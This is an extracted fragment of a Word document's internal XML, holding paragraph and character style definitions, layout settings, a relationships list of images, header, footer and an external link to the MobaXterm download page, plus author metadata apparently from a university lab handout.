      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E3F20"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="BodyTextIndentChar" w:customStyle="1">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="008E3F20"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextFirstIndent2">
    <w:name w:val="Body Text First Indent 2"/>
    <w:basedOn w:val="BodyTextIndent"/>
    <w:link w:val="BodyTextFirstIndent2Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E3F20"/>
    <w:pPr>
      <w:spacing w:after="60"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="BodyTextFirstIndent2Char" w:customStyle="1">
    <w:name w:val="Body Text First Indent 2 Char"/>
    <w:basedOn w:val="BodyTextIndentChar"/>
    <w:link w:val="BodyTextFirstIndent2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="008E3F20"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtCourier" w:customStyle="1">
    <w:name w:val="_txtCourier"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00A6227C"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E3F20"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtHinhCaption" w:customStyle="1">
    <w:name w:val="_txtHinhCaption"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00DE0889"/>
    <w:pPr>
      <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:color w:val="auto"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="normaltextrun" w:customStyle="1">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0091784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109716">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1363825492">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2124954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2.emf" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId20"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hyperlink" Target="https://mobaxterm.mobatek.net/download.html" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="Refa67fb639714c9b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="Rc1fd0fe1ee3345c3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="R50de2bbeadb34bb5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="R1466c26201f44f19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R28b5fd9b72d94050" /></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I</dc:title>
  <dc:subject/>
  <dc:creator>Nguyen Tan Khoi</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>ntkhoi@dut.udn.vn</lastModifiedBy>
  <revision>223</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-21T22:29:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-22T14:09:01.2253975Z</dcterms:modified>
</coreProperties>
</file>